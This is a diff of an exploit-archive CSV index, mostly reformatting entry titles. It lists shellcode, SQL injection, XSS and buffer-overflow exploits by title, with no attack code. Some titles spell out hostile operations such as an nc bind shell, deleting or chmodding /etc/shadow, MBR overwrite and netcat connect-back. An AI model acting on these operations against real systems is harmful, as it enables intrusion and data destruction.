+14247,platforms/php/webapps/14247.txt,"Auction_Software Script Admin Login Bypass Vulnerability",2010-07-06,"ALTBTA ",php,webapps,0 13560,platforms/windows/shellcode/13560.txt,"win xp sp2 PEB ISbeingdebugged shellcode",2009-12-14,anonymous,windows,shellcode,0 13563,platforms/lin_x86/shellcode/13563.asm,"linux/x86 overwrite MBR on /dev/sda with `LOL!' 43 bytes",2010-01-15,root@thegibson,lin_x86,shellcode,0 13565,platforms/win32/shellcode/13565.asm,"Win32 XP SP3 ShellExecuteA shellcode",2009-12-19,sinn3r,win32,shellcode,0 -13566,platforms/lin_x86/shellcode/13566.c,"Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)",2009-12-19,mr_me,lin_x86,shellcode,0 +13566,platforms/lin_x86/shellcode/13566.c,"Linux - setreuid (0_0) & execve(/bin/rm /etc/shadow)",2009-12-19,mr_me,lin_x86,shellcode,0 13569,platforms/win32/shellcode/13569.asm,"Win32 XP SP3 addFirewallRule",2009-12-24,sinn3r,win32,shellcode,0 13570,platforms/freebsd_x86/shellcode/13570.c,"freebsd/x86 portbind shellcode 167 bytes",2009-12-24,sbz,freebsd_x86,shellcode,0 13571,platforms/win32/shellcode/13571.c,"win32/xp sp2 calc.exe 45 bytes",2009-12-24,Stack,win32,shellcode,0 @@ -12015,38 +12057,38 @@ id,file,description,date,author,platform,type,port 13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit module)",2010-03-24,corelanc0d3r,win32,shellcode,0 13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0 13661,platforms/linux/shellcode/13661.txt,"linux x86 nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0 -13669,platforms/linux/shellcode/13669.c,"36 bytes chmod(""/etc/shadow"", 0666) shellcode",2010-04-14,Magnefikko,linux,shellcode,0 +13669,platforms/linux/shellcode/13669.c,"chmod(""/etc/shadow""_ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0 13670,platforms/linux/shellcode/13670.c,"25 bytes execve(""/bin/sh"") shellcode",2010-04-14,Magnefikko,linux,shellcode,0 13671,platforms/linux/shellcode/13671.c,"6 bytes DoS-Badger-Game shellcode",2010-04-14,Magnefikko,linux,shellcode,0 13673,platforms/linux/shellcode/13673.c,"55 bytes SLoc-DoS shellcode by Magnefikko",2010-04-14,Magnefikko,linux,shellcode,0 13675,platforms/lin_x86/shellcode/13675.c,"14 Bytes execve(""a->/bin/sh"") Local-only Shellcode",2010-04-17,Magnefikko,lin_x86,shellcode,0 -13676,platforms/lin_x86/shellcode/13676.c,"33 Bytes chmod(""/etc/shadow"", 0777) Shellcode",2010-04-18,sm0k,lin_x86,shellcode,0 -13677,platforms/linux/shellcode/13677.c,"29 bytes chmod(""/etc/shadow"", 0777) shellcode",2010-04-19,Magnefikko,linux,shellcode,0 +13676,platforms/lin_x86/shellcode/13676.c,"chmod(""/etc/shadow""_ 0777) Shellcode(33 Bytes)",2010-04-18,sm0k,lin_x86,shellcode,0 +13677,platforms/linux/shellcode/13677.c,"chmod(""/etc/shadow""_ 0777) shellcode (29 bytes)",2010-04-19,Magnefikko,linux,shellcode,0 13679,platforms/linux/shellcode/13679.py,"Linux write() & exit(0) shellcode genearator with customizable text",2010-04-20,Stoke,linux,shellcode,0 13680,platforms/linux/shellcode/13680.c,"Linux x86 polymorphic forkbombe - 30 bytes",2010-04-21,"Jonathan Salwan",linux,shellcode,0 13681,platforms/linux/shellcode/13681.c,"Linux x86 forkbombe",2010-04-21,"Jonathan Salwan",linux,shellcode,0 -13682,platforms/lin_x86/shellcode/13682.c,"34 bytes setreud(getuid(), getuid()) & execve(""/bin/sh"") Shellcode",2010-04-22,Magnefikko,lin_x86,shellcode,0 +13682,platforms/lin_x86/shellcode/13682.c,"setreud(getuid()_ getuid()) & execve(""/bin/sh"") Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode,0 13688,platforms/lin_x86-64/shellcode/13688.c,"Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode",2010-04-25,zbt,lin_x86-64,shellcode,0 13691,platforms/linux/shellcode/13691.c,"Linux/x86_64 execve(""/bin/sh""); 30 bytes shellcode",2010-04-25,zbt,linux,shellcode,0 13692,platforms/linux/shellcode/13692.c,"linux/x86 sends ""Phuck3d!"" to all terminals (60 bytes) shellcode",2010-04-25,condis,linux,shellcode,0 -13697,platforms/lin_x86/shellcode/13697.c,"Linux x86 - execve(""/bin/bash"",""-p"",NULL) - 33 bytes",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 -13698,platforms/linux/shellcode/13698.c,"Linux x86 - polymorphic execve(""/bin/bash"",""-p"",NULL) - 57 bytes",2010-05-05,"Jonathan Salwan",linux,shellcode,0 +13697,platforms/lin_x86/shellcode/13697.c,"Linux x86 - execve(""/bin/bash""_""-p""_NULL) (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode,0 +13698,platforms/linux/shellcode/13698.c,"Linux x86 - polymorphic execve(""/bin/bash""_""-p""_NULL) (57 bytes)",2010-05-05,"Jonathan Salwan",linux,shellcode,0 13699,platforms/win32/shellcode/13699.txt,"WinXP SP2 Fr Download and Exec Shellcode",2010-05-10,Crack_MaN,win32,shellcode,0 -13702,platforms/linux/shellcode/13702.c,"Linux x86 execve(""/usr/bin/wget"", ""aaaa""); - 42 bytes",2010-05-17,"Jonathan Salwan",linux,shellcode,0 -13703,platforms/linux/shellcode/13703.txt,"linux/x86 sys_execve(""/bin/sh"", ""0"", ""0"") with umask 16 (sys_umask(14)) 45 bytes",2010-05-31,gunslinger_,linux,shellcode,0 -13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(""/bin/sh"",""/bin/sh"",NULL) - 27 bytes",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 +13702,platforms/linux/shellcode/13702.c,"Linux x86 execve(""/usr/bin/wget""_ ""aaaa""); (42 bytes)",2010-05-17,"Jonathan Salwan",linux,shellcode,0 +13703,platforms/linux/shellcode/13703.txt,"linux/x86 sys_execve(""/bin/sh""_ ""0""_ ""0"") with umask 16 (sys_umask(14)) (45 bytes)",2010-05-31,gunslinger_,linux,shellcode,0 +13704,platforms/solaris_x86/shellcode/13704.c,"Solaris/x86 - execve(""/bin/sh""_""/bin/sh""_NULL) (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13707,platforms/solaris_x86/shellcode/13707.c,"Solaris/x86 - Halt shellcode - 36 bytes",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode,0 13709,platforms/solaris_x86/shellcode/13709.c,"Solaris/x86 - Reboot() - 37 bytes",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode,0 13711,platforms/solaris_x86/shellcode/13711.c,"Solaris/x86 - Remote Download file - 79 bytes",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode,0 13712,platforms/linux/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse - 106 bytes",2010-05-25,"Jonathan Salwan",linux,shellcode,0 -13715,platforms/linux/shellcode/13715.c,"Linux/x86 pwrite(""/etc/shadow"", hash, 32, 8) Shellcode 83",2010-05-27,agix,linux,shellcode,0 +13715,platforms/linux/shellcode/13715.c,"Linux/x86 pwrite(""/etc/shadow""_ hash_ 32_ 8) Shellcode 83",2010-05-27,agix,linux,shellcode,0 13716,platforms/linux/shellcode/13716.c,"Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes",2010-05-27,agix,linux,shellcode,0 13719,platforms/win64/shellcode/13719.txt,"Windows 7 Pro SP1 64 Fr (Beep) Shellcode 39 Bytes",2010-05-28,agix,win64,shellcode,0 -13722,platforms/linux/shellcode/13722.c,"linux/x86 Shellcode Polymorphic - setuid(0) + chmod(""/etc/shadow"", 0666) Shellcode 61 Bytes",2010-05-31,antrhacks,linux,shellcode,0 +13722,platforms/linux/shellcode/13722.c,"linux/x86 Shellcode Polymorphic - setuid(0) + chmod(""/etc/shadow""_ 0666) Shellcode (61 Bytes)",2010-05-31,antrhacks,linux,shellcode,0 13723,platforms/linux/shellcode/13723.c,"change mode 0777 of ""/etc/shadow"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 13724,platforms/linux/shellcode/13724.c,"kill all running process x86/linux",2010-05-31,gunslinger_,linux,shellcode,0 13725,platforms/linux/shellcode/13725.txt,"change mode 0777 of ""/etc/passwd"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 -13726,platforms/linux/shellcode/13726.txt,"45 bytes sys_execve(""/bin/sh"", ""-c"", ""reboot"") x86 linux shellcode",2010-05-31,gunslinger_,linux,shellcode,0 +13726,platforms/linux/shellcode/13726.txt,"sys_execve(""/bin/sh""_ ""-c""_ ""reboot"") x86 linux shellcode (45 bytes)",2010-05-31,gunslinger_,linux,shellcode,0 13728,platforms/linux/shellcode/13728.c,"39 bytes sys_setuid(0) & sys_setgid(0) & execve (""/bin/sh"") x86 linux shellcode",2010-06-01,gunslinger_,linux,shellcode,0 13729,platforms/win64/shellcode/13729.txt,"Windows 7 x64 (cmd) Shellcode 61 Bytes",2010-06-01,agix,win64,shellcode,0 13730,platforms/linux/shellcode/13730.c,"33 bytes unlink ""/etc/shadow"" x86 linux shellcode",2010-06-02,gunslinger_,linux,shellcode,0 @@ -12057,11 +12099,13 @@ id,file,description,date,author,platform,type,port 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion Vulnerability",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 -13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS, SQL Injection Vulnerability",2010-06-06,Ariko-Security,php,webapps,0 +13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS & SQL Injection Vulnerability",2010-06-06,Ariko-Security,php,webapps,0 13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQLi and XSS Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13742,platforms/linux/shellcode/13742.c,"48 bytes chown root:root /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 13743,platforms/linux/shellcode/13743.c,"45 bytes give all user root access when execute /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 +15498,platforms/multiple/dos/15498.html,"Mozilla Firefox <= 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0 +15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow Exploit (SEH)",2010-11-12,Dr_IDE,windows,local,0 13744,platforms/php/webapps/13744.txt,"RTRandomImage Remote File Inclusion Vulnerability",2010-06-06,"Sn!pEr.S!Te Hacker",php,webapps,0 13745,platforms/php/webapps/13745.txt,"Sphider Script Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 13746,platforms/php/webapps/13746.txt,"Joomla Component com_searchlog SQL Injection",2010-06-06,d0lc3,php,webapps,0 @@ -12100,10 +12144,16 @@ id,file,description,date,author,platform,type,port 13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (from the wild) (0day)",2010-06-09,Unknown,multiple,remote,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 +14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion Vulnerability",2010-07-09,Li0n-PaL,php,webapps,0 13790,platforms/asp/webapps/13790.txt,"iClone SQL Injection Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 +14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 +14334,platforms/lin_x86/shellcode/14334.c,"Linux x86 netcat connect back port 8080 - 76 bytes",2010-07-11,blake,lin_x86,shellcode,0 13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL Injection Vulnerability",2010-06-09,Sudden_death,php,webapps,0 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager SQLi Vulnerability",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability",2010-06-09,Sid3^effects,multiple,webapps,0 +27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk Arbitrary File Upload and Script Execution Vulnerability",2006-06-05,Kil13r,php,webapps,0 +27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 13796,platforms/php/webapps/13796.txt,"joomla com_jstore SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13797,platforms/php/webapps/13797.txt,"joomla com_jtickets SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13798,platforms/php/webapps/13798.txt,"joomla com_jcommunity SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 @@ -12157,7 +12207,7 @@ id,file,description,date,author,platform,type,port 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies Web Server Remote Poison null byte Exploit",2010-06-13,kingcope,multiple,remote,80 13852,platforms/php/webapps/13852.txt,"phpplanner <= PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 -13854,platforms/php/webapps/13854.txt,"UTStats XSS, SQL Injection & Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 +13854,platforms/php/webapps/13854.txt,"UTStats - XSS & SQL Injection & Full path disclosure",2010-06-13,"LuM Member",php,webapps,0 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. SQL Injection Vulnerability",2010-06-13,Mr.P3rfekT,php,webapps,0 13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0 13857,platforms/php/webapps/13857.txt,"Yamamah Photo Gallery 1.00 SQL Injection Vulnerability (calbums)",2010-06-13,CoBRa_21,php,webapps,0 @@ -12205,10 +12255,10 @@ id,file,description,date,author,platform,type,port 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security - 143 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition <= 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 -13910,platforms/lin_x86/shellcode/13910.c,"Polymorphic Bindport 31337 with setreuid (0,0) linux/x86",2010-06-17,gunslinger_,lin_x86,shellcode,0 +13910,platforms/lin_x86/shellcode/13910.c,"Polymorphic Bindport 31337 with setreuid (0_0) linux/x86",2010-06-17,gunslinger_,lin_x86,shellcode,0 13911,platforms/php/webapps/13911.txt,"Live CMS SQL Injection Vulnerability",2010-06-17,ahwak2000,php,webapps,0 13912,platforms/php/webapps/13912.txt,"Havij <= 1.10 - Persistent XSS",2010-06-17,hexon,php,webapps,0 -13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (""/etc/passwd"", 0777) & exit(0) - 63 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 +13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (""/etc/passwd""_ 0777) & exit(0) (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability",2010-06-17,Gamoscu,php,webapps,0 13918,platforms/multiple/webapps/13918.txt,"Spring Framework arbitrary code execution",2010-06-18,"Meder Kydyraliev",multiple,webapps,0 13919,platforms/windows/dos/13919.c,"Corel VideoStudio Pro X3 - (.mp4) Buffer Overflow",2010-06-18,"fl0 fl0w",windows,dos,0 @@ -12229,6 +12279,7 @@ id,file,description,date,author,platform,type,port 13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection Vulnerability (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection Vulnerability",2010-06-19,ahwak2000,php,webapps,0 13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - CSRF Proof of Concept",2010-06-19,"Luis Santana",php,webapps,0 +14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard SQL Injection Vulnerability",2010-08-31,Ariko-Security,php,webapps,0 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp (.maf) Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 @@ -12247,6 +12298,9 @@ id,file,description,date,author,platform,type,port 13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 +14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0 +14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 +14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability",2010-07-14,"Meder Kydyraliev",multiple,remote,0 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery Vulnerability",2010-06-21,"Jeremiah Talamantes",php,webapps,0 13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection Vulnerability",2010-06-21,"Th3 RDX",php,webapps,0 13962,platforms/php/webapps/13962.txt,"Joomla Component JomSocial 1.6.288 - Multiple XSS",2010-06-21,jdc,php,webapps,0 @@ -12274,6 +12328,7 @@ id,file,description,date,author,platform,type,port 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13993,platforms/php/webapps/13993.txt,"k-search (sql/XSS) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 +14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection Vulnerability",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection Vulnerability",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar SQL Injection Vulnerability",2010-06-23,"L0rd CrusAd3r",php,webapps,0 @@ -12299,7 +12354,6 @@ id,file,description,date,author,platform,type,port 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community portal""user-profile.php"" SQL Injection Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal ""viewpropertydetails.php"" SQL injection",2010-06-24,Sangteamtham,php,webapps,0 14020,platforms/php/webapps/14020.txt,"2DayBiz - The Web Template Software SQL Injection and XSS Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 -14025,platforms/php/webapps/14025.txt,"2daybiz Job site Script SQL injection",2010-06-24,Sangteamtham,php,webapps,0 14026,platforms/php/webapps/14026.txt,"AbleDating script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2daybiz B2B Portal Script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 @@ -12307,11 +12361,11 @@ id,file,description,date,author,platform,type,port 14030,platforms/asp/webapps/14030.pl,"phportal_1.2 (gunaysoft.php) Remote File Include Vulnerability",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI Vulnerability",2010-06-24,"Zer0 Thunder",php,webapps,0 -14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14035,platforms/php/webapps/14035.txt,"Big Forum SQL Injection Vulnerability (forum.php?id)",2010-06-24,JaMbA,php,webapps,0 14036,platforms/windows/dos/14036.pl,"Geomau 7 - (.wg2) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14037,platforms/windows/dos/14037.pl,"Plotwn 18 - (.wp2) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 +14116,platforms/linux/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) (28 bytes)",2010-06-29,"Jonathan Salwan",linux,shellcode,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script SQL Injection and Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 14048,platforms/php/webapps/14048.txt,"2DayBiz Multiple SQL Injection",2010-06-25,Sangteamtham,php,webapps,0 @@ -12327,14 +12381,17 @@ id,file,description,date,author,platform,type,port 14058,platforms/aix/webapps/14058.html,"PHPnuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component Persistent XSS Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 +14085,platforms/php/webapps/14085.txt,"iNet Online Community Blind SQLi Vulnerability",2010-06-28,JaMbA,php,webapps,0 +14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 +14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability",2010-06-28,Dark.Man,php,webapps,0 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0 +14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0 14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - (.m3u) Local BoF PoC",2010-06-26,Madjix,windows,dos,0 14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - (.mds) (.mdf) Buffer Overflow PoC",2010-06-27,"fl0 fl0w",windows,dos,0 -14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 14074,platforms/php/webapps/14074.rb,"2daybiz Polls Script SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 14075,platforms/php/webapps/14075.rb,"2daybiz Freelance Script SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 14076,platforms/php/webapps/14076.rb,"2daybiz Photo Sharing Script SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 @@ -12343,49 +12400,44 @@ id,file,description,date,author,platform,type,port 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine SQL Injection Vulnerability",2010-06-27,Sid3^effects,php,webapps,0 14080,platforms/php/webapps/14080.txt,"I-Net MLM Script Engine SQL Injection Vulnerability",2010-06-27,Sid3^effects,php,webapps,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0 -14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 SQL Injection Vunerability",2010-06-27,"L0rd CrusAd3r",php,webapps,0 -14085,platforms/php/webapps/14085.txt,"iNet Online Community Blind SQLi Vulnerability",2010-06-28,JaMbA,php,webapps,0 -14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability",2010-06-28,Dark.Man,php,webapps,0 +14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 +14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(""/bin/sh""_""/bin/sh""_0) (30 bytes)",2010-06-28,"Jonathan Salwan",linux,shellcode,0 14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 -14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 - Stack Buffer Overflow",2010-06-28,"fl0 fl0w",windows,local,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - CSRF Vulnerability",2010-06-28,"ADEO Security",php,webapps,0 -14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(""/bin/sh"",""/bin/sh"",0) - 30 bytes",2010-06-28,"Jonathan Salwan",linux,shellcode,0 +14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote DoS",2010-06-28,Markot,windows,dos,80 +14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 (videos.php) SQL Injection Vulnerability",2010-06-29,Mr-AbdoX,php,webapps,0 +14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript (ypncat_id) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 +14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS Remote SQL Injection Vulnerability",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload Vulnerability",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80 -14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS Remote SQL Injection Vulnerability",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 